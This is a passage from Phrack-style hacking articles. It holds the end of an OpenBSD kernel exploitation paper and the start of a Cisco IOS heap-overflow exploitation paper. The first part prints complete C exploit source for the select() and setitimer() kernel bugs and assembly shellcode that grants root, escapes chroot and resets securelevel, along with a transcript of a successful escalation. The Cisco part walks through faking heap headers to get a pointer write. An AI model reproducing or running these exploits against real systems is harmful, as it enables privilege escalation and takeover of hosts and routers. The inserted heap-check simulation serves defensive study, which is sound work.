mov  0x14(%ecx),%edx  	# edx = p->p_fd
mov  %eax,0xc(%edx)   	# p->p_fd->fd_rdir = 0

--[ 6.2.3 - securelevel  

OpenBSD has 4 different securelevels starting from permanently insecure to
highly secure mode. The system by default runs at level 1 which is the
secure mode. Secure mode restrictions are as follows:

-   securelevel may no longer be lowered except by init
-   /dev/mem and /dev/kmem may not be written to
-   raw disk devices of mounted file systems are read-only
-   system immutable and append-only file flags may not be removed
-   kernel modules may not be loaded or unloaded

Some of these restrictions might complicate further compromise of the
system. So we should also take care of the securelevel flag and reset it to
0, which is the insecure level that gives you privileges such as being able
to load kernel modules to further penetrate the system.

But there were many problems in run time searching of the address of
securelevel in memory without false positives, so I chose to utilize this
attack at a later stage: the stage at which we have uid 0 and have broken
free of the jail. Now we have all the interfaces mentioned in section 5.4
available to query any kernel symbol and retrieve its address.

bash-2.05a# /usr/bin/nm /bsd | grep securelevel
e05cff38 B _securelevel

For this reason an additional, second stage exploit was crafted (without
any difference, other than the payload) that executes the following
assembly routine and returns to user land, using the idtr technique. See
ex_select_obsd_secl.c in section 10.

call moo
.long 0x12345678     <-- address of securelevel filled by user
pop  %edi
mov  (%edi),%ebx      # address of securelevel in ebx
		      # reset security level to 0/insecure
xor  %eax,%eax        # eax = 0
mov  %eax,(%ebx)      # securelevel = 0


--[ 6.3 - Get root & escape jail

All of the above is chained into 2 pieces of exploit code. Here is the door
to freedom! (Exploits and payloads can be found in section 10)

bash-2.05a# gcc -o ex ex_select_obsd.c
bash-2.05a# gcc -o ex2 ex_select_obsd_secl.c
bash-2.05a# cp ex /var/tmp/jail/
bash-2.05a# cp ex2 /var/tmp/jail/
bash-2.05a# nc -v localhost 1024
uid=32767 gid=32767
ls /

[*] OpenBSD 2.x - 3.x select() kernel overflow     [*]
[*] by    Sinan "noir" Eren  -  [email protected]   [*]

userland: 0x0000df38 parent_proc: 0xe46373a4
uid=0(root) gid=32767(nobody)
uname -a
OpenBSD kernfu 3.1 GENERIC#59 i386
ls /
sysctl kern.securelevel
kern.securelevel = 1
nm /bsd | grep _securelevel
e05cff38 B _securelevel
./ex2 e05cff38
sysctl kern.securelevel
kern.securelevel = 0

... ;)

Directly copying the exploit into the jailed environment might seem a bit
unrealistic but it really is not an issue: with system call redirection
[MAXIMI], or even by using slightly more imaginative shellcodes, you can
execute anything from a remote source without any further need for a shell
interpreter. To the best of my knowledge there are 2 commercial products
that have already achieved such remote execution simulations. [IMPACT],

--[ 7 - Conclusions

My goal in writing this paper was to try to prove that kernel land
vulnerabilities such as stack overflows and integer conditions can be
exploited and lead to total control over the system, no matter how strict
your user land (i.e., privilege separation) or even kernel land (i.e.,
chroot, systrace, securelevel) enforcements are ... I also tried to
contribute to the newly raised concepts (greets to Gera) of fail-safe and
reusable exploitation code generation.

I would like to end this article with my favorite vuln-dev posting of all

Subject:   RE: OpenSSH Vulns (new?) Priv seperation
reducing root-run code from 27000 to 2500 lines is the important part.
who cares how many holes there are when it is in /var/empty/sshd chroot
with no possibility of root :)


[ I CARE. lol! ;)]

--[ 8 - Greetings

Thanks to Dan and Dave for correcting my English and committing many logic
fixes. Thanks to certain anonymous people for their help and support.

Greets to: optyx, dan, dave aitel, gera, bind, jeru, #convers
uberhax0r, olympos and gsu.linux ppl

Most thanks of all go to Asli for support, help and her never-ending
affection. I love you, mosirrr!!

--[ 9 -	References

- [ESA]     	Exploiting Kernel Buffer Overflows FreeBSD Style

- [LSD-PL]	Kernel Level Vulnerabilities, 5th Argus Hacking Challenge

- [4.4 BSD]	The Design and Implementation of the 4.4BSD Operating

- [Intel]	Intel Pentium 4 Processors Manuals

- [ALEPH1]	Smashing The Stack For Fun And Profit

- [MAXIMI]	Syscall Proxying - Simulating Remote Execution



- [ODED]	Big Loop Integer Protection
		 0x09 by Oded Horovitz

--[ 10 - Code

<++> ./ex_kernel/ex_select_obsd.c
 ** OpenBSD 2.x 3.x select() kernel bof exploit
 ** Sinan "noir" Eren 
 ** [email protected] | [email protected].net
 ** (c) 2002 

#include <stdio.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/mman.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/sysctl.h>
#include <sys/signal.h>
#include <sys/utsname.h>
#include <sys/stat.h>

/* kernel_sc.s shellcode */ 
unsigned char shellcode[] = 

void sig_handler();
void get_proc(pid_t, struct kinfo_proc *);

main(int argc, char **argv)
   char *buf, *ptr, *fptr;
   u_long pgsz, *lptr, pprocadr;
   struct kinfo_proc kp;

  printf("\n\n[*] OpenBSD 2.x - 3.x select() kernel overflow   [*]\n");
  printf("[*] by  Sinan \"noir\" Eren  -  [email protected]  [*]\n");
  printf("\n\n"); sleep(1);

  	 pgsz = sysconf(_SC_PAGESIZE);  
	 fptr = buf = (char *) malloc(pgsz*4);
	 if(!buf) { 
	 memset(buf, 0x41, pgsz*4);

	buf = (char *) (((u_long)buf & ~pgsz) + pgsz);

	get_proc((pid_t) getppid(), &kp);
	pprocadr = (u_long) kp.kp_eproc.e_paddr;

	ptr = (char *) (buf + pgsz - 200); /* userland adr */
	lptr = (long *) (buf + pgsz - 8);

	*lptr++ = 0x12345678; /* saved %ebp */
	*lptr++ = (u_long) ptr; /*(uadr + 0x1ec0);  saved %eip */

	shellcode[5] = pprocadr & 0xff;
	shellcode[6] = (pprocadr >> 8) & 0xff;
	shellcode[7] = (pprocadr >> 16) & 0xff;
	shellcode[8] = (pprocadr >> 24) & 0xff;

	memcpy(ptr, shellcode, sizeof(shellcode)-1);

        printf("userland: 0x%.8x ", ptr);	
	printf("parent_proc: 0x%.8x\n", pprocadr);

	if( mprotect((char *) ((u_long) buf + pgsz), (size_t)pgsz,
						 PROT_WRITE) < 0) {

	signal(SIGSEGV, (void (*)())sig_handler);
	select(0x80000000, (fd_set *) ptr, NULL, NULL, NULL);



get_proc(pid_t pid, struct kinfo_proc *kp)
   u_int arr[4], len;

        arr[0] = CTL_KERN;
        arr[1] = KERN_PROC;
        arr[2] = KERN_PROC_PID;
        arr[3] = pid;
        len = sizeof(struct kinfo_proc);
        if(sysctl(arr, 4, kp, &len, NULL, 0) < 0) {
                fprintf(stderr, "this is an unexpected error, rerun!\n");

<--> ./ex_kernel/ex_select_obsd.c
<++> ./ex_kernel/ex_select_obsd_secl.c
 ** OpenBSD 2.x 3.x select() kernel bof exploit
 ** securelevel reset exploit, this is the second stage attack
 ** Sinan "noir" Eren 
 ** [email protected] | [email protected]
 ** (c) 2002 

#include <stdio.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/mman.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/signal.h>
#include <sys/utsname.h>
#include <sys/stat.h>

/* sel_sc.s shellcode */
unsigned char shellcode[] = 

void sig_handler();

main(int argc, char **argv)
   char *buf, *ptr, *fptr;
   u_long pgsz, *lptr, secladr;

	if(!argv[1]) {
	printf("Usage: %s secl_addr\nsecl_addr: /usr/bin/nm /bsd |"
       	" grep _securelevel\n", argv[0]);

	secladr = strtoul(argv[1], NULL, 16);

  	 pgsz = sysconf(_SC_PAGESIZE);  
	 fptr = buf = (char *) malloc(pgsz*4);
	 if(!buf) { 
	 memset(buf, 0x41, pgsz*4);

	buf = (char *) (((u_long)buf & ~pgsz) + pgsz);

	ptr = (char *) (buf + pgsz - 200); /* userland adr */
	lptr = (long *) (buf + pgsz - 8);

	*lptr++ = 0x12345678; /* saved %ebp */
	*lptr++ = (u_long) ptr; /*(uadr + 0x1ec0);  saved %eip */

	shellcode[5] = secladr & 0xff;
	shellcode[6] = (secladr >> 8) & 0xff;
	shellcode[7] = (secladr >> 16) & 0xff;
	shellcode[8] = (secladr >> 24) & 0xff;

	memcpy(ptr, shellcode, sizeof(shellcode)-1);

	if( mprotect((char *) ((u_long) buf + pgsz), (size_t)pgsz,
					 PROT_WRITE) < 0) {

	signal(SIGSEGV, (void (*)())sig_handler);
	select(0x80000000, (fd_set *) ptr, NULL, NULL, NULL);


<--> ./ex_kernel/ex_select_obsd_secl.c
<++> ./ex_kernel/ex_setitimer_obsd.c
 ** OpenBSD 2.x 3.x setitimer() kernel memory write exploit 
 ** Sinan "noir" Eren
 ** [email protected] | [email protected]
 ** (c) 2002

#include <stdio.h>
#include <sys/param.h>
#include <sys/proc.h>
#include <sys/time.h>
#include <sys/sysctl.h>

struct itimerval val, oval;
int which = 0;

main(int argc, char **argv)
   setitimer(which, &val, &oval);
   printf("uid: %d euid: %d gid: %d \n", getuid(), geteuid(), getgid());
   execl("/bin/sh", "noir", NULL);

   unsigned int arr[4], len;
   struct kinfo_proc kp;
   long stat, cred, rem;

	memset(&val, 0x00, sizeof(val));
	val.it_interval.tv_sec = 0x00;  //fill this with cr_ref
	val.it_interval.tv_usec = 0x00;
	val.it_value.tv_sec = 0x00;
	val.it_value.tv_usec = 0x00;

	arr[0] = CTL_KERN;
	arr[1] = KERN_PROC;
	arr[2] = KERN_PROC_PID;
	arr[3] = getpid();
	len = sizeof(struct kinfo_proc);
	if(sysctl(arr, 4, &kp, &len, NULL, 0) < 0) {
		fprintf(stderr, "this is an unexpected error, rerun!\n");

	printf("proc: %p\n\n", (u_long) kp.kp_eproc.e_paddr);
	printf("pc_ucred: %p ", (u_long) kp.kp_eproc.e_pcred.pc_ucred);

	printf("p_ruid: %d\n\n", (u_long) kp.kp_eproc.e_pcred.p_ruid);
	printf("proc->p_cred->p_ruid: %p, proc->p_stats: %p\n", 
	(char *) (kp.kp_proc.p_cred) + 4, kp.kp_proc.p_stats);
        printf("cr_ref: %d\n", (u_long) kp.kp_eproc.e_ucred.cr_ref);
	cred = (long) kp.kp_eproc.e_pcred.pc_ucred;	
	stat = (long) kp.kp_proc.p_stats;
	val.it_interval.tv_sec = kp.kp_eproc.e_ucred.cr_ref;
	printf("calculating which for u_cred:\n");
	which = cred - stat - 0x90;
	rem = ((u_long)which%0x10);
	printf("which: %.8x reminder: %x\n", which, rem);

	switch(rem) {
	case 0x8:
	case 0x4:
	case 0xc:
	case 0x0:
	 printf("using u_cred, we will have perminent euid=0\n");
	 goto out;
	val.it_interval.tv_sec = 0x00;
	cred = (long) ((char *) kp.kp_proc.p_cred+4);
	stat = (long) kp.kp_proc.p_stats;

	printf("calculating which for u_cred:\n");
	which = cred - stat - 0x90;	
	rem = ((u_long)which%0x10);
	printf("which: %.8x reminder: %x\n", which, rem);

	switch(rem) {
	case 0x8:
	case 0x4:
	 printf("too bad rem is fucked!\nlet me know about this!!\n"); 
	case 0x0:
	case 0xc:
	 which += 0x10;
	printf("\nusing p_cred instead of u_cred, only the new process "
	       "will be priviliged\n");

	which = which >> 4;
	printf("which: %.8x\n", which);	
	printf("addr to overwrite: %.8x\n", stat + 0x90 + (which * 0x10));
<--> ./ex_kernel/ex_setitimer_obsd.c
<++> ./ex_kernel/kernel_sc.s
# kernel level shellcode
# [email protected] |  [email protected]
# 2002
	.align 2,0x90

.globl _main
	.type	_main , @function

call moo
.long 0x12345678
.long 0xdeadcafe
.long 0xbeefdead
pop  %edi
mov  (%edi),%ecx      # parent's proc addr on ecx

# update p_cred->p_ruid
mov  0x10(%ecx),%ebx  # ebx = p_cred 
xor  %eax,%eax        # eax = 0
mov  %eax,0x4(%ebx)
# p_ruid = 0

# update pc_ucred->cr_uid
mov  (%ebx),%edx      # edx = pc_ucred
mov  %eax,0x4(%edx)
# cr_uid = 0

# update p_fd->fd_rdir to break chroot()
mov  0x14(%ecx),%edx # edx = p_fd
mov  %eax,0xc(%edx)
# p_fd->fd_rdir = 0

lea  0x68(%esp),%ebp
# set ebp to normal

# find where to return: sidt technique
sidt 0x4(%edi)
mov  0x6(%edi),%ebx   # mov _idt_region in eax
mov  0x400(%ebx),%edx # _idt_region[0x80 * (2*long) = 0x400]
mov  0x404(%ebx),%ecx # _idt_region[0x404]
shr  $0x10,%ecx
sal  $0x10,%ecx
sal  $0x10,%edx
shr  $0x10,%edx
or   %ecx,%edx        # edx = ecx | edx; _Xosyscall_end

# search for Xosyscall_end+XXX: call _syscall instruction

xor  %ecx,%ecx
inc  %ecx
movb (%edx,%ecx),%bl
cmpb $0xe8,%bl
jne  up

lea  (%edx,%ecx),%ebx # _Xosyscall_end+%ecx: call _syscall
inc  %ecx
mov  (%edx,%ecx),%ecx # take the displacement of the call ins.
add  $0x5,%ecx        # add 5 to displacement
add  %ebx,%ecx        # ecx = _Xosyscall_end+0x20 + disp

# search for _syscall+0xXXX: call *%eax 
# and return to where we were supposed to!
# _syscall+0x240: ff
# _syscall+0x241: d0	0x240,0x241 on obsd3.1

mov  %ecx,%edi         # ecx is addr of _syscall
movw $0xd0ff,%ax
mov  $0xffffffff,%ecx 
scasw    #scan (%edi++) for %ax

#return to *%edi
xor  %eax,%eax  #set up the return value to Success ;)
push %edi
<--> ./ex_kernel/kernel_sc.s
<++> ./ex_kernel/secl_sc.s
# securelevel reset shellcode
# [email protected] |  [email protected]
# 2002
	.align 2,0x90
.globl _main
	.type	_main , @function
call moo
.long 0x12345678
pop  %edi
mov  (%edi),%ebx      # address of securelevel

xor  %eax,%eax        # eax = 0
mov  %eax,(%ebx)
# securelevel = 0

lea  0x68(%esp),%ebp
# set ebp to normal

# find where to return: sidt technique
sidt 0x4(%edi)
mov  0x6(%edi),%ebx   # mov _idt_region in eax
mov  0x400(%ebx),%edx # _idt_region[0x80 * (2*long) = 0x400]
mov  0x404(%ebx),%ecx # _idt_region[0x404]
shr  $0x10,%ecx
sal  $0x10,%ecx
sal  $0x10,%edx
shr  $0x10,%edx
or   %ecx,%edx        # edx = ecx | edx; _Xosyscall_end

# search for Xosyscall_end+XXX: call _syscall instruction

xor  %ecx,%ecx
inc  %ecx
movb (%edx,%ecx),%bl
cmpb $0xe8,%bl
jne  up

lea  (%edx,%ecx),%ebx # _Xosyscall_end+%ecx: call _syscall
inc  %ecx
mov  (%edx,%ecx),%ecx # take the displacement of the call ins.
add  $0x5,%ecx        # add 5 to displacement
add  %ebx,%ecx        # ecx = _Xosyscall_end+0x20 + disp

# search for _syscall+0xXXX: call *%eax 
# and return to where we were supposed to!
# _syscall+0x240: ff
# _syscall+0x241: d0	OBSD3.1

mov  %ecx,%edi         # ecx is addr of _syscall
movw $0xd0ff,%ax
mov  $0xffffffff,%ecx 
scasw    #scan (%edi++) for %ax

#return to *%edi
xor  %eax,%eax  #set up the return value to Success ;)
push %edi
<--> ./ex_kernel/secl_sc.s

|=[ EOF ]=---------------------------------------------------------------=|


                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x3c, Phile #0x07 of 0x10

|=-------------=[ Burning the bridge: Cisco IOS exploits ]=--------------=|
|=----------------=[ FX of Phenoelit <[email protected]> ]=----------------=|

--[ Contents

  1 - Introduction and Limitations
  2 - Identification of an overflow
  3 - IOS memory layout sniplets
  4 - A free() exploit materializes
  5 - Writing (shell)code for Cisco
  6 - Everything not covered in 1-5

--[ 1 - Introduction and Limitations

This article is to introduce the reader to the fun land of exploiting a
routing device made by Cisco Systems. It is not the final word on this
topic and merely reflects our research results.

According to Cisco Systems, around 85% of all software issues in IOS are
the direct or indirect result of memory corruptions. At the time of this
writing, yours truly is not aware of one single case where overflowing
something in Cisco IOS led to a direct overwrite of a return address.
Although there are things like stacks in IOS, it seems to be very uncommon
for IOS coders to use local function buffers. Therefore, most (if not all)
overflows we will encounter are in some way or another heap based.

As a fellow researcher used to say, bugs are not an unlimited resource.
Especially overflow bugs in Cisco IOS are fairly rare and not easily
compared to each other. This article will therefore limit the discussion
to one particular bug: the Cisco IOS TFTP server filename overflow. When
using your router as a TFTP server for files in the flash filesystem, a
TFTP GET request with a long (700 characters) filename will cause the
router to crash. This happens in all IOS versions from 11.1 to 11.3. The
reader might argue the point that this is no longer a widely used branch,
but yours truly asks you to bear with him to the end of this article.

The research results and methods presented here were collected during
inspection and exploitation attempts using the already mentioned TFTP bug.
At the time of this writing, other bugs are being researched and different
approaches are being tested, but the procedure presented here is still seen
as the most promising for widespread use. This translates to: use your
favorite private Cisco IOS overflow and try it.

--[ 2 - Identification of an overflow

While the reader is probably used to identifying stack smashing in a split
second on a commonly used operating system, he might have difficulties
identifying an overflow in IOS. As yours truly already mentioned, most
overflows are heap based. There are two different ways in IOS to identify
a heap overflow when it happens. Being connected to the console, the
reader might see output like this:

01:14:16: %SYS-3-OVERRUN: Block overrun at 2C01E14 (red zone 41414141)
-Traceback= 80CCC46 80CE776 80CF1BA 80CF300
01:14:16: %SYS-6-MTRACE: mallocfree: addr, pc
  20E3ADC,80CA1D8   20DFBE0,80CA1D8   20CF4FC,80CA1D8   20C851C,80CA1D8
  20C6F20,80CA1D8   20B43FC,80CA1D8   20AE130,80CA1D8   2075214,80CA1D8
01:14:16: %SYS-6-MTRACE: mallocfree: addr, pc
  20651E0,80CA1D8   205EF04,80CA1D8   205B338,80CA1D8   205AB80,80CA1D8
  20AFCF8,80CA1C6   205A664,80CA1D8   20AC56C,80CA1C6   20B1A88,80CA1C6
01:14:16: %SYS-6-BLKINFO: Corrupted redzone blk 2C01E14, words 382,
  alloc 80ABBFC, InUse, dealloc 206E2F0, rfcnt 1

In this case, an IOS process called "Check heaps", of which we will hear
a lot more later, has identified a problem in the heap structures. After
doing so, "Check heaps" will cause what we call a software forced crash.
It means that the process kills the Cisco and makes it reboot in order
to get rid of the problem. We all know this behavior from users of
MS-DOS or Windows based systems. What happened here is that an A-Strip
overwrote a boundary between two heap memory blocks. This is protected by
what Cisco calls a "RED ZONE", which in fact is just a static canary.

The other way a heap overflow could manifest itself on your console is an
access violation:

*** BUS ERROR ***
access address = 0x5f227998
program counter = 0x80ad45a
status register = 0x2700
vbr at time of exception = 0x4000000
special status word = 0x0045
faulted cycle was a longword read

This is the case when you are lucky and half of the work is already done.
IOS used a value that you somehow influenced and referenced unreadable
memory. Unfortunately, those overflows are harder to exploit later, since
tracking is a lot more difficult.

At this point in time, you should try to figure out under which exact
circumstances the overflow happens - pretty much like with every other bug
you find. If the lower limit of your buffer size changes, try to make sure
that you don't play with the console or telnet(1) connections to the router
during your tests. The best is always to test the buffer length with a just
rebooted router. While it doesn't change much for most overflows, some
react differently when the system is freshly rebooted compared to a system
in use.

--[ 3 - IOS memory layout sniplets

To get any further with the overflow, we need to look at the way IOS
organizes memory. There are basically two main areas in IOS: process memory
and IO memory. The latter is used for packet buffers, interface ring
buffers and so on and can be of interest for exploitation but does not
provide some of the critical things we are looking for. The process memory
on the other hand behaves a lot like dynamic heap memory in Linux.

Memory in IOS is split up in blocks. There seems to be a number of pointer
tables and meta structures dealing with the memory blocks and making sure
IOS can access them in an efficient way. But at the end of the day, the
blocks are held together in a linked list structure and store their
management information mostly inline. This means every memory block has
a header, which contains information about the block, its previous one
and the next one in the list.

 .-- | Block A      | <-.
 |   +--------------+   |
 +-> | Block B      | --+
     | Block C      |

The command "show memory processor" clearly shows the linked list

A memory block itself consists of the block header with all the inline
management information, the data part where the actual data is stored
and the red zone, which we already encountered. The format is as follows:

 |<-  32 bit  ->|        Comment
 | MAGIC        |        Static value 0xAB1234CD
 | PID          |        IOS process ID
 | Alloc Check  |        Area the allocating process uses for checks
 | Alloc name   |        Pointer to string with process name
 | Alloc PC     |        Code address that allocated this block
 | NEXT BLOCK   |        Pointer to the next block
 | PREV BLOCK   |        Pointer to the previous block
 | BLOCK SIZE   |        Size of the block (MSB marks "in use")
 | Reference #  |        Reference count (again ???)
 | Last Deallc  |        Last deallocation address
 |   DATA       |
 |              |
 |              |
 | RED ZONE     |        Static value 0xFD0110DF

In case this memory block is used, the size field will have its most
significant bit set to one. The size is represented in words (2 bytes),
and does not include the block overhead. The reference count field is
obviously designed to keep track of the number of processes using this
block, but yours truly has never seen this being something other than 1
or 0. Also, there seem to be no checks for this field in place.

In case the memory block is not used, some more management data is
introduced at the point where the real data was stored before:

 | MAGIC2       |        Static value 0xDEADBEEF
 | Somestuff    |
 | PADDING      |
 | PADDING      |
 | FREE NEXT    |        Pointer to the next free block
 | FREE PREV    |        Pointer to the previous free block
 |              |
 |              |
 | RED ZONE     |        Static value 0xFD0110DF

Therefore, a free block is an element in two different linked lists:
One for the blocks in general (free or not), another one for the list of
free memory blocks. In this case, the reference count will be zero and
the MSB of the size field is not set. Additionally, if a block was used
at least once, the data part of the block will be filled with 0x0D0D0D0D.
IOS actually overwrites the block data when a free() takes place to prevent
software issues from getting out of hand.

At this point, yours truly would like to return to the topic of the "Check
heaps" process. It is here to run about once a minute and checks the doubly
linked lists of blocks. It basically walks them down from top to bottom to
see if everything is fine. The tests employed seem to be pretty extensive
compared to common operating systems such as Linux. As far as yours truly
knows, this is what it checks:
	1) Does the block begin with MAGIC (0xAB1234CD)?
	2) If the block is in use (MSB in size field is set), check if the
	   red zone is there and contains 0xFD0110DF.
	3) Is the PREV pointer not NULL?
	4) If there is a NEXT pointer ...
	4.1) Does it point right after the end of this block?
	4.2) Does the PREV pointer in the block pointed to by NEXT point
	     back to this block's NEXT pointer?
	5) If the NEXT pointer is NULL, does this block end at a memory
	   region/pool boundary [NOTE: not sure about this one].
	6) Does the size make sense? [NOTE: The exact test done here is
	   still unknown]

If one of these tests is not satisfied, IOS will declare itself unhappy and
perform a software forced crash. To some extent, one can find out which
test failed by taking a look at the console output line that says
"validblock_diagnose = 1". The number indicates what could be called "class
of tests", where 1 means that the MAGIC was not correct, 3 means that the
address is not in any memory pool and 5 is really a bunch of tests but
mostly indicates that the tests outlined in points 4.1 and 4.2 failed.

--[ 4 - A free() exploit materializes

Now that we know a bit about the IOS memory structure, we can plan to
overflow with some more interesting data than just 0x41. The basic idea is
to overwrite the next block header, thereby providing some data to IOS, and
let it work with this data in a way that gives us control over the CPU. How
this is usually done is explained in [1]. The most important difference
here is that we first have to make "Check heaps" happy. Unfortunately,
some of the checks are also performed when memory is allocated or free()ed.
Therefore, slipping under the timeline of one minute between two "Check
heaps" runs is not an option here.

The biggest problems are the PREV pointer check and the size field. Since
the vulnerability we are working with here is a string overflow, we also
have the problem of not being able to use 0x00 bytes. Let's try to deal
with the issues we have one by one.

The PREV pointer has to be correct. Yours truly has not found any way to
use arbitrary values here. The check outlined in the checklist as 4.2 is a
serious problem, since it is done on the block we are sitting in - not the
one we are overflowing. To illustrate the situation:

     | Block Head   |
     | AAAAAAAAAAAA |    <--- You are here
     | RED ZONE     |    <--- Your data here
     | Block Head   |

We will call the uppermost block, whose data part we are overflowing, the
"host block", because it basically "hosts" our evildoing. For the sake of
clarity, we will call the overwritten block header the "fake block", since
we try to fake its contents.

So, when "Check heaps" or comparable checks during malloc() and free() are
performed on our host block, the overwrite is already noticed. First of
all, we have to append the red zone canary to our buffer. If we overflow
exactly with the number of bytes the buffer can hold and append the red
zone dword 0xFD0110DF, "Check heaps" will not complain. From here on, it's
fair game up to the PREV ptr - because the values are either static (MAGIC)
or totally ignored (PID, Alloc ptrs).

Assuming we overwrite RED ZONE, MAGIC, PID, the three Alloc pointers, NEXT
and PREV, a check performed on the host block will already trigger a
software forced crash, since the PREV pointer we overwrote in the next
block does not point back to the host block. We have only one way today to
deal with this issue: we crash the device. The reason behind this is that
we put it in a fairly predictable memory state. After a reboot, the memory
is more or less structured the same way. This also depends on the amount
of memory available in the device we are attacking and it's certainly not a
good solution. When crashing the device the first time with an A-Strip, we
can try to grab logging information off the network or the syslog server if
such a thing is configured. Yours truly is totally aware of the fact that
this prevents real-world application of the technique. For this article,
let's just assume you can read the console output.

Now that we know the PREV pointer to put into the fake block, let's go on.
For now ignoring the NEXT pointer, we have to deal with the size field. The
fact that this is a 32bit field and we are doing a string overflow prevents
us from putting reasonable numbers in there. The smallest number for a used
block would be 0x80010101 and for an unused one 0x01010101. This is much
more than IOS would accept. But to make a long story short, putting
0x7FFFFFFF in there will pass the size field checks. As simple as that.

In this particular case, as with many application level service overflows
in IOS, our host block is one of the last blocks in the chain. The
simplest case is when the host block is the next-to-last block. And voilà,
this is the case with the TFTP server overflow. In other cases, the attack
involves creating more than one fake block header and becomes increasingly
complicated but not impossible. But from this point on, the discussion is
pretty much centered around the specific bug we are dealing with.

Assuming normal operation, IOS will allocate some block for storing the
requested file name. The block after that is the remaining free memory.
When IOS is done with the TFTP operation, it will free() the block it just
allocated. Then, it will find out that there are two free blocks - one
after the other - in memory. To prevent memory fragmentation (a big problem
on heavy load routers), IOS will try to coalesce (merge) the free blocks
into one. By doing so, the pointers for the linked lists have to be
adjusted. The NEXT and PREV pointers of the block before that and the block
after that (the remaining free memory) have to be adjusted to point to each
other. Additionally, the pointers in the free block info FREE NEXT and FREE
PREV have to be adjusted, so the linked list of free blocks is not broken.

All of a sudden, we have two pointer exchange operations that could
really help us. Now, we know that we can not choose the pointer in PREV.
Although we can choose the pointer in NEXT, assuming that "Check heaps"
does not fire before our free() took place, this only allows us to write
the previous pointer to any writable location in the router's memory. While
this is useful by itself, we will not look deeper into it but go on to the
FREE NEXT and FREE PREV pointers. As the focused reader surely noticed,
these two pointers are not validated by "Check heaps".

What makes exploitation of this situation extremely convenient is the
fact that the pointer exchange in FREE PREV and FREE NEXT only relies on
the values in those two fields. What happens during the merge operation is:
	+ the value in FREE PREV is written to where FREE NEXT points to
	  plus an offset of 20 bytes
	+ the value in FREE NEXT is written to where FREE PREV points to
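
The "Check heaps" checklist and the free-list merge described above can be modelled on a small simulated pool. The following C code is an added example, not IOS code and not the author's: the struct layout, all function names and the item 6 bound are assumptions, and safe_unlink() adds the back-pointer validation that the text notes is missing for FREE NEXT and FREE PREV.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAGIC    0xAB1234CDu   /* constants quoted in the text */
#define MAGIC2   0xDEADBEEFu
#define RED_ZONE 0xFD0110DFu
#define IN_USE   0x80000000u   /* MSB of the size field */
struct blk {                   /* simplified header, not the IOS field order */
    uint32_t magic;
    uint32_t size;             /* payload size in 2-byte words; MSB = in use */
    struct blk *next;          /* following block, NULL for the last one */
    struct blk **prev;         /* address of the previous block's next field */
};
struct freeinfo {              /* kept at the start of a free block's payload */
    uint32_t magic2;
    struct freeinfo *free_next;
    struct freeinfo **free_prev;   /* address of the slot pointing at this entry */
};
#define POOL_LEN (3 * (sizeof(struct blk) + 28 + 4))  /* header, 14 words, red zone */
static uint8_t *pool;          /* constructed sample pool */
static struct blk *head;       /* list anchor; the first block's prev points here */
static struct freeinfo *free_head;

static uint8_t *payload(const struct blk *b) { return (uint8_t *)(b + 1); }
static size_t nbytes(const struct blk *b) { return (size_t)(b->size & ~IN_USE) * 2; }
static uint8_t *blk_end(const struct blk *b) { return payload(b) + nbytes(b) + 4; }

/* Returns 0 if b passes, else the failed checklist item (41 = 4.1, 42 = 4.2). */
int check_block(const struct blk *b, const uint8_t *pool_end)
{
    size_t avail = (size_t)(pool_end - payload(b));
    uint32_t rz;
    if (b->magic != MAGIC) return 1;
    if (nbytes(b) > avail || avail - nbytes(b) < 4) return 6;  /* must fit in pool */
    memcpy(&rz, payload(b) + nbytes(b), sizeof rz);
    if ((b->size & IN_USE) && rz != RED_ZONE) return 2;
    if (b->prev == NULL) return 3;
    if (b->next == NULL) return blk_end(b) == pool_end ? 0 : 5;
    if ((const uint8_t *)b->next != blk_end(b)) return 41;
    if ((size_t)(pool_end - blk_end(b)) < sizeof *b) return 41;
    if (b->next->prev != &b->next) return 42;
    return 0;
}

int check_heap(const struct blk *first, const uint8_t *pool_end)
{
    int rc = 0;
    for (const struct blk *b = first; b != NULL && rc == 0; b = b->next)
        rc = check_block(b, pool_end);      /* stops at the first failed block */
    return rc;
}

/* Unlink fi from the free list only if both neighbours still point back at
   it. A production allocator would also range-check both pointers first. */
int safe_unlink(struct freeinfo *fi)
{
    if (fi->magic2 != MAGIC2) return -1;
    if (fi->free_prev == NULL || *fi->free_prev != fi) return -1;
    if (fi->free_next != NULL && fi->free_next->free_prev != &fi->free_next) return -1;
    *fi->free_prev = fi->free_next;
    if (fi->free_next != NULL) fi->free_next->free_prev = fi->free_prev;
    return 0;
}

static struct blk *put(uint8_t *at, int used, struct blk **prev)
{
    struct blk *b = (struct blk *)at;   /* memory is zeroed, so next == NULL */
    b->magic = MAGIC;
    b->size = 14u | (used ? IN_USE : 0u);
    b->prev = prev;
    *prev = b;                          /* link the previous block (or anchor) */
    memcpy(payload(b) + nbytes(b), &(uint32_t){RED_ZONE}, 4);
    return b;
}

/* Constructed sample: two used blocks followed by one free block. */
void build_pool(void)
{
    free(pool);
    if ((pool = calloc(1, POOL_LEN)) == NULL) abort();
    struct blk *a = put(pool, 1, &head);
    struct blk *h = put(blk_end(a), 1, &a->next);
    struct blk *f = put(blk_end(h), 0, &h->next);
    free_head = (struct freeinfo *)payload(f);
    free_head->magic2 = MAGIC2;
    free_head->free_prev = &free_head;
}

int main(void)
{
    build_pool();
    printf("clean pool: %d\n", check_heap(head, pool + POOL_LEN));
    memset(payload(head->next), 0x41, nbytes(head->next) + 4);  /* clobber red zone */
    printf("after overrun: %d\n", check_heap(head, pool + POOL_LEN));
    printf("unlink: %d\n", safe_unlink(free_head));
    return 0;
}
```

In this model a size of 0x7FFFFFFF is rejected by the item 6 bound, and an unlink whose FREE PREV slot does not point back at the entry is refused before any write happens.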

The only thing we need now is a place to write a pointer to. As with many
other pointer based exploits, we are looking for a fairly static location
in memory to do this. Such a static location (changes per IOS image) is the
process stack of standard processes loaded right after startup. But how do
we find it?

In the IOS memory list, there is an element called the "Process Array".
This is a list of pointers - one for every process currently running in
IOS. You can find its location by issuing a "show memory processor
allocating-process" command (output trimmed):

radio#show memory processor allocating-process

          Processor memory

 Address Bytes Prev.   Next    Ref  Alloc Proc Alloc PC  What
258AD20   1504 0       258B32C   1  *Init*     20D62F0   List Elements
258B32C   3004 258AD20 258BF14   1  *Init*     20D6316   List
